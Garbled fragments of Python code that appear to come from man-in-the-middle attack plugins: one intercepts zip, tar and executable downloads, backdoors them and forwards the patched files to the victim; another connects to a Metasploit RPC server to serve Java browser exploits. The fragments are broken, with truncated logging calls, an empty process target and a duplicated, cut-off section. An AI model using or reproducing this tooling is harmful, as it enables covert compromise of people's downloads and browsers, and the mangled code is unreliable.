self.patched.put(tempZipFile) return def handleResponse(self, request, data): content_header = request.client.headers['Content-Type'] client_ip = request.client.getClientIP() if content_header in self.zipMimeTypes: if self.bytes_have_format(data, 'zip'):"%s Detected supported zip file type!" % client_ip) process = multiprocessing.Process(name='zip',, args=(data,)) process.daemon = True process.start() process.join() bd_zip = self.patched.get() if bd_zip:"%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_zip} else: for tartype in ['gz','bz','tar']: if self.bytes_have_format(data, tartype):"%s Detected supported tar file type!" % client_ip) process = multiprocessing.Process(name='tar_files', target=self.tar_files, args=(data,)) process.daemon = True process.start() process.join() bd_tar = self.patched.get() if bd_tar:"%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_tar} elif content_header in self.binaryMimeTypes: for bintype in ['pe','elf','fatfile','machox64','machox86']: if self.bytes_have_format(data, bintype):"%s Detected supported binary type!" % client_ip) fd, tmpFile = mkstemp() with open(tmpFile, 'w') as f: f.write(data) process = multiprocessing.Process(name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile,)) process.daemon = True process.start() process.join() patchb = self.patched.get() if patchb: bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read() os.remove('./backdoored/' + os.path.basename(tmpFile))"%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_binary} else: mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header)) return {'request': request, 'data': data}
self.javacfg = options.configfile['JavaPwn'] except Exception, e: sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) self.msfport = msfcfg['msfport'] self.rpcip = msfcfg['rpcip'] self.rpcpass = msfcfg['rpcpass'] #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) self.black_ips = [] try: msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary msf.login('msf', self.rpcpass) version ='core.version')['version'] self.tree_output.append("Connected to Metasploit v%s" % version) except Exception: sys.exit( "[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server" ) t = threading.Thread(name='pwn', target=self.pwn, args=(msf, )) t.setDaemon(True) t.start() #start the main thread def rand_url( self ): #generates a random url for our exploits (urls are generated with a / at the beginning) return "/" + ''.join(
try: self.javacfg = options.configfile['JavaPwn'] except Exception, e: sys.exit("[-] Error parsing config for JavaPwn: " + str(e)) self.msfport = msfcfg['msfport'] self.rpcip = msfcfg['rpcip'] self.rpcpass = msfcfg['rpcpass'] #Initialize the BrowserProfiler plugin BrowserProfiler.initialize(self, options) self.black_ips = [] try: msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary msf.login('msf', self.rpcpass) version ='core.version')['version'] self.tree_output.append("Connected to Metasploit v%s" % version) except Exception: sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") t = threading.Thread(name='pwn', target=self.pwn, args=(msf,)) t.setDaemon(True) t.start() #start the main thread def rand_url(self): #generates a random url for our exploits (urls are generated with a / at the beginning) return "/" + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(5)) def get_exploit(self, java_version): exploits = []